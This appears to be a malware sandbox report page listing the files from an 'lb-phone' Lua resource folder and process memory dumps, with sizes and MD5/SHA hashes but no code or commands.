3KB

MD5
6b0c36b6aee4542a3b6e6012a3ba0bbf

SHA1
546836736ce7ee4a5ba8687ac1509c54235f0e9a

SHA256
ec206ebdafd3557d961c5638c29d427cfd8e327f90a1e0f9f40ef27108d8ad94

SHA512
89e86731543841fe7740e818823ec18a62a735cee6790b64a49b7e12f336ff3328c69954a6c674f7b48598c9ff7bcb84723a8853797c7115dfb21d5d527d43cf

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\client.lua

Filesize
26KB

MD5
f923d533658ffc73d6e54137541f4013

SHA1
c8d9e9c1cdcb0d70c34e292e0ca2d03cf0c5a75e

SHA256
e0fdc82bc04b2255b7f2592085bcea834870ec6db869d562e31afa3a62702459

SHA512
0eabafc77bcfe213be69bff88e49d453983e579cfccee47df73dfa44fef7a53a5feb730029ffd9ee5a83e1325c6ec6b32876bbcd16f10fa759acf2243d2668ad

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\client2.lua

Filesize
21KB

MD5
0137939c3fbe4df5e669c892f9e31a8a

SHA1
f977fafa1d92834a5ba6e7cf2428ca7767d0b6b7

SHA256
1b8e0997289aae945d850aab8a29274a17bd55b99e8592005a3667a0fcaf4090

SHA512
6559562148328dc674f2fbd3207c6e9c7860330b9c89b83edaafe7d9a91fffffb7a8e712aa392286834e3a343d9afc479c5e9e244a1821333e2c9ad6d375fc14

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\fatura.lua

Filesize
607B

MD5
1619c51a3d9121cf4a4fab4b1f9f1301

SHA1
129cb82fb6de3da9df7e75ef019518760ac2483d

SHA256
7db76ff729b76b3aebbbe39431beff66487c464ac9253c2995b12fc95f7d2692

SHA512
95bb8e2b750495d97ee36d9a1ac1ed17bd88a3dec1b6cf95c0b33739ebc20815063ac3b010f9707e89a1087ca54b3b2b1b474e1ae0d172aa747488622164c43d

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\instagram.lua

Filesize
6KB

MD5
da5f0a3109e53894d607afc793a6818e

SHA1
3547e86afc4826048fc5e185be472be80d54b4d0

SHA256
b368783aeac657859818c9740ab01b28655b4febfb383f1a37b75313c0d45235

SHA512
81115b194aa1e0bebfd061cbfa208fa407f3648d184b7e55d3659042bb1f54f690617c8944b0df1851424c4882a45e651569fee1dbb1ebb13a2f23dfadafc03c

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\photo.lua

Filesize
1KB

MD5
76d77b8c6bbc612f69119f1bf87e0e21

SHA1
3c21fc74ad50c2947ed3bc932fab907ba43a78ed

SHA256
88edcc001c39d99c14a05bc4385728dc1b3a92fa71af68b44db96039bcfc0616

SHA512
fe85cd6a88c7a57bcae2faf7bf81aa879bd7812613d2092ef10df615addbe5329e065e7f816546ff3f79cf5e13e2712b7dc863f497922a9c9b631018af213bba

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\twitter.lua

Filesize
5KB

MD5
0db01c390da7f6c41954954f522f37ec

SHA1
f10f12a78cba86f75f270311bbdf98a2f303a3af

SHA256
2cbb71e3c8c8ca2d2e95115bf903250cdad958217cd129dfecbc255fe4a83e90

SHA512
8665c4ae02a4355dd2c0128382c111a866f3f08daea9417aadf60d40e81b0713b9ff14befb765f430a4fd16dde09fa79798f32a6558ad688ffe542bb2b221d14

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\valet.lua

Filesize
4KB

MD5
6a96a9ddca7a9cf9f13ab96103593c52

SHA1
c4e66efa5298bc1de021ac218beac0ccc9ab03a7

SHA256
296ead07101ab11b1b3083e161c4868055ed5b561908a6270517188f5298de47

SHA512
9861454b70d552260e4396722fdbef3ace9933b7c751f0a0f88f31a9f716a9c40953477ab1614978d1a76a4f8eff448e296f0396adfd4f524211994e5f178b9d

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\yellow.lua

Filesize
2KB

MD5
42129070f00b2b1beff2ea95773f9446

SHA1
aa2ac834a21289c51a21c32a30611a168a22578c

SHA256
d709c42097943f72db128c61c383b829c469f68455ca30fc3b6214d345b57254

SHA512
86bdd832a8e5de8bdb68abb0a653726a984fc07976d3ccc1b5f6b65c2b2718df0f1c7abda6513679c485def415039b72550be0041b7523e2e17008a3071dfd87

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\client\youtube.lua

Filesize
827B

MD5
542d4fbd81a8f154067d4f7294e6bdd9

SHA1
f4f89bfbf9f8ce0986c5dfc07e3d2be06ec75f5b

SHA256
a30385e15de8b0f073e7e8eba59fa5b5db7ec86cdf053de51b89aa5830fa386c

SHA512
f8f0a3a9321ed3aa3892aa1eab4ddbbb98a13d8f5c4ce99db963f1f8a6ae0c315c6e280a0cb337c6b4081edf082cb1deeb1f05a8a62eadb429970b466c9e228a

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\config.lua

Filesize
2KB

MD5
30536c3b9729a64dd4a56b110fec3175

SHA1
c928a8f5f39857b468c0951b462478318c4129e8

SHA256
2da3894488d368e11627079833453634c2feb9010cfe9a2adf182e0a0ed17d47

SHA512
9243c5a71b6da01f91d19086d1cb71fe1145f8fd461a9fa111af33c35a1d6cfeba1148fffe6dd8cd10480d72352ae0386fc9366fc43a7b22b30eaebc202ec670

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\fxmanifest.lua

Filesize
1KB

MD5
229111ede8c6edaa7681d3fab14575ce

SHA1
5fe822cd0bc4991c7901fad45ea70917f1d414f0

SHA256
84cbd0432513c731dacfe94805b536850ded5ecfa4d263b5394a68729d01c876

SHA512
a0071e6ad863ec14446104591a464451c78ff721cd8c4512c704fe1d593e69b45542a8c0d0201cf2332f645444e24484dd4a5cc2531b18801de2ecfb5e3814bd

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\locales\en.lua

Filesize
3KB

MD5
e4ee4123012095bdf47b9ca49b1b1d38

SHA1
76d4ac9de00b7009c90e5060bc80390333178540

SHA256
264da41c85f5640c424b42d081595766f37454e9a1d1188facf202d3a98854c2

SHA512
33a892190a584696013cf76f8bc16956938bba95ac6f496c35bab3bd70cdca204339a6b54e8b7eefb6675d4ef488de7f78646df0abf8c4e91e2ec2efb33065ff

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\app_tchat.lua

Filesize
1KB

MD5
59e2161454715b2580db40321f4fe16f

SHA1
d947776256dab2c998407aecaec676acfd87a5f6

SHA256
248231e4ce1d2bb8bd73465fff559fa305c446a92770a63743d9694cc3336396

SHA512
a0670793f63c3042d006585f53ff0ecd7dafbc374ada4969bfed4c0db37d78fefbaf5510943ec360ce8dcc9cc48b098aa34718f3475eaab8102856a91f4c2318

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\bank.lua

Filesize
22KB

MD5
6f6fbb561141a0a5113278b2e31a92b6

SHA1
8576392b9ce373870b40505dfd3348aa953059cd

SHA256
72dcebfc0f5c15797d6271448bfc08a7375a54b02634609fddaba49b9176cd79

SHA512
b417f1c16d023da85c4fc294dc156a5ab56b23845d1ff0af97eb922a7d8ad158c9809d3d1588366089fecce6bed724a7e0b14b9a5799ffe830b3474e6f4f29da

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\fatura.lua

Filesize
2KB

MD5
e93455d1a15845b9c519021b733e8504

SHA1
9e85566c5a9cd4cbbdba3b9938c9366b67d95dbe

SHA256
53c47041c9e8de8595f434a2103a6da6a28f64cc7bde4f3941db473fff8bb721

SHA512
4c83797ef7c4b861842ddb46aeb43e108b35054c6b5991725a2418bf8a615b1df9852e53ac8bf8881f7632747f28a621160c502eba07b8bc46a8074ba5b81010

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\instagram.lua

Filesize
19KB

MD5
13f85b2028c940a70e67fd1e05e8cfb2

SHA1
b5414ecb555679fdcdff8e4d1d14ea46a0db28cb

SHA256
3b56c04a361ab8989a47856847b0bdf20adea41ecebc960a7e037fc2c37a517c

SHA512
cf0e0da123e723e02abe49ab3213eb4fde07f24e6205399ade19f589910365c188522e1805e37c833e02a8f95b6d328b97c62143277e957a964e45bcc3c9cebb

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\server.lua

Filesize
38KB

MD5
72ee657a65d4f36dd77241a18d2d20d8

SHA1
6566f0da84c352bdf3f7032fb9b8fbd9414f66fc

SHA256
7ea2bc81cc28b3471f6f7c9ffdeb2e6b6905aeb5208893c60ff2151fc8b97f49

SHA512
7cd8bbd9220902d3e48aa1c8d9127cc67aecc818e5ed3f72cde6f5d6da331af49404e1039fb7734a746febf520bdbd378e608d4ab97fe554dcd79a1418912fcd

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\server2.lua

Filesize
33KB

MD5
f67cfa419efb61edd48b20dcc32b55b7

SHA1
3791952224a2db69ba4db1e2ffb6ea53eead5455

SHA256
320575ac9fdd5803d320532163230af1291484579138c42b061b951d88315400

SHA512
91ab2c9698f84b1d08b47926ebedb85f8ec4858bc2b77cea98aa233aae4ae9f2161b00b3604e6b65ef43fab3f38b6cfa3a497511061176f934cdad25d9bbaf04

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\twitter.lua

Filesize
19KB

MD5
2b815d4592a74e81acc0788043b45727

SHA1
71710066291c60677a395114cb1a5c6577ffd3e4

SHA256
c22e8e167d08f4be1f9c656fe3b6a7dfe25c200bd625d8759167160635d7c847

SHA512
6fc7a2c0ccd5316cbfeae6d4a6209d05689b5adce68fef6eee3665c14a1b21125ce783f189ecee8832a4f2f42a91fb0ece49074dd210a326d34ff3572f8de403

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\valet.lua

Filesize
1KB

MD5
cd6afb7fef64c44c2568158e43f7013c

SHA1
b5c1b9e55cd45bf344ba9bf9b7b1067b1677936d

SHA256
903aaff4fb17b5337a961a0718e68407ffb58ac7fa19b9ffcd2ceb9bb635513d

SHA512
1246d151a1093d5cf719977150eac0a524c0c8ff1660d45c10ae7f2cb73c5b5a05788c2d1c71ea2ae03622c653a25e1be7199164ed40741ef514560682817f20

Download Submit
C:\Users\Admin\Downloads\lb-phone\lb-phone\server\yellow.lua

Filesize
3KB

MD5
44faaeb3b2f79f7fce88e7e23bfd7e73

SHA1
5be2776f0373ba7be26b2ebb00ab684ed2134dd2

SHA256
ed613a46192d1fa0746c8039ece15e5c69fb486ddef3ee618a08c39a8affa064

SHA512
4ca5a40603b14992bf137feec4dbf7606fbc6f6c28d1cc09d4b8021d7f7470c79b2c5b6a5b72c022e1d42f01d41676646e39e05de72933aab680ed3bb3b36177

Download Submit
\??\pipe\crashpad_1120_OYKWEHEUYQHTFWWJ

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1072-2244-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1072-2276-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2756-2274-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/3092-2392-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/3188-55-0x0000000004BD0000-0x0000000004BDA000-memory.dmp

Filesize
40KB

Download
memory/3188-74-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/3188-75-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/3188-73-0x0000000074FBE000-0x0000000074FBF000-memory.dmp

Filesize
4KB

Download
memory/3188-67-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/3188-56-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/3188-54-0x0000000004BE0000-0x0000000004C72000-memory.dmp

Filesize
584KB

Download
memory/3188-53-0x00000000050F0000-0x0000000005694000-memory.dmp

Filesize
5.6MB

Download
memory/3188-2188-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/3188-52-0x00000000001A0000-0x00000000001DE000-memory.dmp

Filesize
248KB

Download
memory/3188-51-0x0000000074FBE000-0x0000000074FBF000-memory.dmp

Filesize
4KB

Download
memory/5232-2335-0x0000018F5BE40000-0x0000018F5BE62000-memory.dmp

Filesize
136KB

Download
memory/5232-2345-0x0000018F5C1A0000-0x0000018F5C1C6000-memory.dmp

Filesize
152KB

Download
memory/5232-2346-0x0000018F5C200000-0x0000018F5C214000-memory.dmp

Filesize
80KB

Download
memory/5876-10821-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-11060-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-11225-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-2397-0x0000000002D00000-0x0000000002D1A000-memory.dmp

Filesize
104KB

Download
memory/5876-2291-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-2434-0x0000000002D00000-0x0000000002D1A000-memory.dmp

Filesize
104KB

Download
memory/5876-10770-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-10599-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-11061-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-10589-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-2395-0x0000000002BA0000-0x0000000002BB6000-memory.dmp

Filesize
88KB

Download
memory/5876-10798-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-10567-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-9135-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-10736-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-11247-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-3104-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-10701-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-3743-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5876-2380-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/5912-2311-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download
memory/5912-2316-0x00007FF87A690000-0x00007FF87A6A0000-memory.dmp

Filesize
64KB

Download
memory/5912-2312-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download
memory/5912-2315-0x00007FF87A690000-0x00007FF87A6A0000-memory.dmp

Filesize
64KB

Download
memory/5912-2314-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download
memory/5912-2310-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download
memory/5912-2412-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download
memory/5912-2313-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download
memory/5912-2413-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download
memory/5912-2414-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download
memory/5912-2415-0x00007FF87C6F0000-0x00007FF87C700000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads